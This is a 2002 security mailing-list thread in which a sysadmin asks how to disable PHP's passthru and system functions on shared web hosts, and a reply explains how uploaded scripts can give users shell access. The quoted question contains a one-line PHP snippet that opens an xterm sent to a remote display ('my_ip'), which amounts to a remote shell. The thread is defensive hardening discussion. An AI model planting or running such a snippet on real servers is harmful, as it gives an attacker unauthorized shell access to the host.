RE: php & passthru & system

[Lloyd Richardson <Lrichardson () mind ca>]

There are many ways of accomplishing the exact same thing.  The problem is
that giving an ftp account on the box that allows them to upload things that
are executable via the webserver ( If the are allow to run cgi scripts etc..
) .  You could write a very simple script to pass commands directly to
through the webserver that would run as whatever the virtually hosted
customers account was.  ( This is assuming apache is running in a suexec
environment with php compiled to run via CGI)  So basically, in  a web
hosting environment an end user can basically build their own shell access
if the ISP doesn't provide it right into a HTTP page which is really nothing
new, and a good reason to keep an eye on suid local binaries....

-----Original Message-----
From: Evrim ULU [mailto:evrim () envy com tr]
Sent: Tuesday, April 23, 2002 3:15 AM
To: vuln-dev () security-focus com
Subject: php & passthru & system


hi,


i was wondering if there is a way to disable the passthru and system 
functions in php easily.

There are a lot of webhosting firms serving php with ftp accounts and 
i've seen that if their firewall is not configured properly i can open a 
xterm with my user priviledges.

<?
passthru("`which xterm` --display=my_ip:0.0");
?>

same thing for system is also valid of course.


Abusing the system after having the shell access is easy. Most of the 
sysadms do not patch the system since nobody have a valid shell access.

Is there an easy way to disable these function before compilation&after 
compliation and any firewall rules like -A OUTPUT -p tcp 
--destination-port 6000 -j DROP?

thnx.



-- 
Evrim ULU
evrim () envy com tr / evrim () core gen tr
sysadm
http://www.core.gen.tr